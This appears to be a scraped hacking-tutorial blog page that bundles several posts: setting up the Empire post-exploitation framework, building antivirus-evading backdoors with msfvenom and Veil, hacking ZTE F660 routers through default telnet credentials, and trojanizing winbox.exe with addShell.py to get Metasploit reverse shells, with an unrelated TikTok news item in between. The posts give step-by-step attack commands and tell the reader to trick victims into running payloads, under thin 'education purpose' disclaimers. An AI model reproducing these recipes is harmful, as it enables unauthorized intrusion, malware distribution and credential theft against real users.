How To Install Empire:Generate Payload To Powershell


Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Empire relies heavily on the work from several other projects for its underlying functionality. We have tried to call out a few of those people we've interacted with heavily here and have included author/reference link information in the source of each Empire module as appropriate. If we have failed to improperly cite existing or prior work, please let us know.


Open Google.com
Type Empire Github

Download Zip



After finish.
Extrack File Empire-master.zip

Next We have install via Terminal.
Open setup folder
Type ./install.sh

After Finish. Back to Empire-master folder with type ../
Next. Open Empire , type ./empire

Success.

Turorial Version Video in Below

This Application only for Education Purpose
Happy Learning

Related Posts:

Hack Windows FUD Anti VIrus


FUD In Wikipedia : (usually shortened as "FUD") can stand for data that had been encrypted, making it appear to be random noise. It can also stand for software that cannot be detected by anti-viruses when a scan is performed.[1] The term is used in hacker circles to refer to something that appears to be clean to many anti-viruses, even though it is a hacking tool.

Tools
Kali Linux. Download in https://www.kali.org/

Lets Get Tutorial:
Open Terminal in Kali Linux
Type : msfvenom -p windows/shell_hidden_bind_tcp ahost=192.168.10211 lport=8888 -f psh-cmd > /root/Desktop/hack.bat
192.168.10.211 : Your Ip Address
8888 : Port that will you use
/root/Desktop/ : Location of payload .bat
hack.bat : Name of Payload

In Victim. 
trick the windows user to open the payload you created.
This Method FUD AV . in this tutorial im use Avast Antivirus

After Open hack.bat
type nc 192.168.10.14 8888
for Access a Dir Target

Next . We need Create a backdoor for acceess Victim Full Access.
In this tutorial im use Veil Evasion for Create backdoor.
Open New terminal for Open Veil Framework
Type list for see list atabase payload on Veil Evasion
Select Powershell/Shellcode_inject/downloadd_virtual
Type Number 25

Set Lhost 192.168.10.211
Lport : 444
And Gernerate
192.168.10.211 : Your Ip Address
4444 : Port that will you use

Payload File : Location of Payload
Handler File : Location Of handler

Handler file is you have access the msfconsole easily

In Location of handler 
Type msfconsole -r payload_handler.rc

Open FIle of Payload with Text Editor
Copy that



Paste in the first terminal.

The meterreter process will open in the second terminal


Watch in Too :
Tutorial Version Video


This Content Only For Education Purpose
Happy Learning

Related Posts:

Hacking ZTE F660 Password Login


Hacking ZTE F660
Tools :
  1. System Operation Windows or Linux
  2. Putty
  3. Internet Connection


Tutorial : 
First, You need connect in Local Area Network of ZTE F660, but if you know the Ip Public Zte F660 you have access the Unit from everywhere.

Open Putty.
You Have Download Putty In Official Putty in https://www.putty.org/
Input Host Name : Ip Address Of  ZTE F660
Port : 23
Click Open

Input Login : root
Password : Zte521

Type : sendcmd 1 DB UseInfo
For Result The User And Password

And you Have Look Username And Password

Use Username And Password for Login in ZTE F660 in Your Browser

Tutorial Version Video


Thanks.
Happy Learning

Related Posts:

Tik Tok. Popular Application in China - Blocked In Indonesia

Tik Tok's active daily user in China in June 2018 was recorded at 150 million users. Even Tik Tok so most iPhone users downloaded applications in early 2018 until now.

Tik Tok known as Douyin in China, which means less is a short video, is a music video platform and social media network from China launched in September 2016 by Zhang Yiming.

Minister of Communications and Informatics Rudiantara has just decided to block Tik Tok in Indonesia. In fact, Tik Tok is a very popular application in China.

Tik Tok is the most downloaded app in the App Store in Q1 2018, which is 45.8 million downloads. Underneath is YouTube with 35.3 million downloads, WhatsApp 33.8 million, Facebook Messenger 31.3 million, and Instagram 31 million.

In Google Play Store Indonesia, Tik Tok is currently the second most downloaded free app.

For information, Tik Tok's corporate center is Beijing Bytedance Technology, which in November 2017 acquired Musical.ly, which is also a music video platform.

This app allows its users to create a short music video using some of the music already provided in the app. Then the user can record anything for 60 seconds, and combine the video with the music that is already available.

Tik Tok first penetrated Indonesia in September 2017, and became a very popular application in some circles, especially teenagers. Until now the application is blocked by Kemenkominfo.

The urge to block this app is booming in social media. In fact, there are netizens who make petitions to request this application is closed because it is considered more bring negativ nature.

When deciding to block Tik-Tok, Menkominfo Rudiantara claimed to have coordinated with the Ministry of PPA and the Commission for the Protection of Indonesian Children (KPAI).

Related Posts:

Crypter Backdoor To EXE - Fully Undetectable Anti Virus


The method a crypter can be executed by the vb.net and performed on the windows operating system. In background Linux, addShell.py is the solution. On the method that will learnhacker share is to combine a backdoor into the software EXE format.
In this tutorial is a winbox.exe application that will be wrapped with a backdoor / virus. To execute it is when windows user open Winbox.exe to open Mikrotik then a backdoor will follow  executed. At that moment the session meterpreter will open.

Here is the tutorial

Download addShell.py in Here 
First, Open folder addShell.py via terminal
For ses tutorial use addShell.py type in terminal python addShell.py

Next. Create backdoor/Combine a exe file to backdoor
python addShell.py -f ./winbox.exe -H 192.168.10.211 -P 5555 -p 0
Press Enter
winbox exe : The exe file to be in combine with a backdoor
-H 192.168.10.211 : Is Ip Address linux
-P 5555 : The Port to be use for access a victim

The result Precess crypter and will create a new file exe in winbox_evil format

Next run msfconsole
type msfconsole
start for create multi handler
use exloi/multi/handler
set payload windows/shell_reverse_tc

Set LHOST "Ip address Linux"
Set LPORT "Port corresponds to the port during the backdoor creation process"
Next Type Run/exploit

In Windows Victim, Run or openWinbox_evil.exe

In the Terminal will look like this
This result is if a victim success open winbox_evil
Until here you success hack a windows.
But you in Shell windows.

If you want to open the meterpreter session, this will make it easier for you to open meterpreter.
You need create a backdoor again. and you have create backdoor with msfvenom, veil_evasion, FatRat, or other Software.
In This tutorial im using Veil Evasion for Create backdoor

Select powershell/meterpreter/rev_https
This command for create backdoor bat format.
Ok, follow our tutorial
Open New terminal. So we have Two terminals  open.

Set LHOST "Ip Address Linux"
Set LPORT "New Port for Access Windows"
And
Generate

Display results as below
Payload file : Location payload
Handler File : Location Handler ( you have use the handler for open msfconsole )

Open via terminal location of handler like below.
And type msfconsole -r "name of handler"

Then result of handler like this.

Open Location bat file via file manager.
Open bat file via gedit/leafpad

Select all. And Copy this script.

Paste in first Terminal

And Then in second terminal meterpreter session will be opened like below
Type session -i for look session victim
Select session 1
And you got full system victim with all prifilage.
You have doing anything in victim OS(Windows)

Tutorial Version Video in Below


Hapy Learning.
All method for Education Purpose

Related Posts: